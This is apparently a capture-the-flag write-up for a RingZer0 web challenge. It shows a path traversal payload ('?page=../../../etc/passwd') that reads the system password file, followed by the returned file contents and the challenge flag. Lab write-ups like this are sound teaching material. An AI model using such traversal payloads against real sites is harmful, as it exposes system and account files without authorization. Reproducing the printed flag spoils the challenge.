Web

Looking for password file

Password file

The hint tells us a to look for a password file.
The url is http://ringzer0team.com:1008/?page=lorem.php The ?page= is a giveaway for a page that could be vulnerable to path traversal.

In the linux system the password file is located in /etc/passwd

So let’s try to get to the file

http://ringzer0team.com:1008/?page=../../../etc/passwd

Results

 root❌0:0:root:/root:/bin/bash
 daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin
 bin❌2:2:bin:/bin:/usr/sbin/nologin sys❌3:3:sys:/dev:/usr/sbin/nologin
 sync❌4:65534:sync:/bin:/bin/sync
 games❌5:60:games:/usr/games:/usr/sbin/nologin
 man❌6:12:man:/var/cache/man:/usr/sbin/nologin
 lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin
 mail❌8:8:mail:/var/mail:/usr/sbin/nologin
 news❌9:9:news:/var/spool/news:/usr/sbin/nologin
 uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
 proxy❌13:13:proxy:/bin:/usr/sbin/nologin
 www-data❌33:33:www-data:/var/www:/usr/sbin/nologin
 backup❌34:34:backup:/var/backups:/usr/sbin/nologin list❌38:38:Mailing List
 Manager:/var/list:/usr/sbin/nologin
 irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats❌41:41:Gnats
 Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
 nobody❌65534:65534:FLAG-zH9g1934v774Y7Zx5s16t5ym8Z:/nonexistent:/usr/sbin/nologin
 libuuid❌100:101::/var/lib/libuuid:
 sshd❌101:65534::/var/run/sshd:/usr/sbin/nologin
 syslog❌102:105::/home/syslog:/bin/false 

And there’s the flag!

The flag is : FLAG-zH9g1934v774Y7Zx5s16t5ym8Z